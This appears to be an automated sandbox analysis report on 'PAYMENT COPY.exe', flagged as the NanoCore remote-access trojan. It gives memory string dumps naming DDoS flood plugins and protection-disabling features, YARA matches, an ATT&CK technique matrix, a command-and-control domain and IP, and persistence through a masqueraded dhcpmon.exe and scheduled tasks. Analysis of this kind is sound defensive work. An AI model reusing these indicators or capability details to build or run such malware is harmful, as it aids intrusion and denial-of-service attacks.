enWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
    Source: PAYMENT COPY.exe, 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: PAYMENT COPY.exe, 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: PAYMENT COPY.exeString found in binary or memory: NanoCore.ClientPluginHost
    Source: PAYMENT COPY.exe, 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Source: dhcpmon.exe, 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
    Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
    Source: dhcpmon.exe, 0000000F.00000002.298632979.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278355916.0000000002411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298587099.0000000002291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORY
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing32NTDSSecurity Software Discovery141Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 356453 Sample: PAYMENT COPY.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 57 Multi AV Scanner detection for domain / URL 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 16 other signatures 2->63 8 PAYMENT COPY.exe 19 2->8         started        12 dhcpmon.exe 17 2->12         started        14 PAYMENT COPY.exe 17 2->14         started        16 dhcpmon.exe 9 2->16         started        process3 file4 47 C:\Users\user\AppData\Local\...\System.dll, PE32 8->47 dropped 67 Maps a DLL or memory area into another process 8->67 18 PAYMENT COPY.exe 1 15 8->18         started        49 C:\Users\user\AppData\...\ri8clfcgml62un.dll, PE32 12->49 dropped 51 C:\Users\user\AppData\Local\...\System.dll, PE32 12->51 dropped 23 dhcpmon.exe 3 12->23         started        53 C:\Users\user\AppData\Local\...\System.dll, PE32 14->53 dropped 25 PAYMENT COPY.exe 3 14->25         started        signatures5 process6 dnsIp7 55 chinomso.duckdns.org 185.150.24.55, 49725, 49728, 49734 SKYLINKNL Netherlands 18->55 35 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\Roaming\...\run.dat, International 18->37 dropped 39 C:\Users\user\AppData\Local\...\tmpEEDF.tmp, XML 18->39 dropped 41 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 18->41 dropped 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->65 27 schtasks.exe 1 18->27         started        29 schtasks.exe 1 18->29         started        43 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 23->43 dropped 45 C:\Users\user\...\PAYMENT COPY.exe.log, ASCII 25->45 dropped file8 signatures9 process10 process11 31 conhost.exe 27->31         started        33 conhost.exe 29->33         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PAYMENT COPY.exe35%ReversingLabsWin32.Backdoor.Androm
    PAYMENT COPY.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe35%ReversingLabsWin32.Backdoor.Androm
    C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsmD8C8.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsmD8C8.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsoF70E.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsoF70E.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\ri8clfcgml62un.dll15%ReversingLabsWin32.Trojan.Generic

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    1.2.PAYMENT COPY.exe.342c1f8.24.unpack100%AviraTR/NanoCore.fadteDownload File
    15.2.dhcpmon.exe.4e30000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    0.0.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    8.1.PAYMENT COPY.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    15.1.dhcpmon.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    14.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    14.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    10.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    10.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
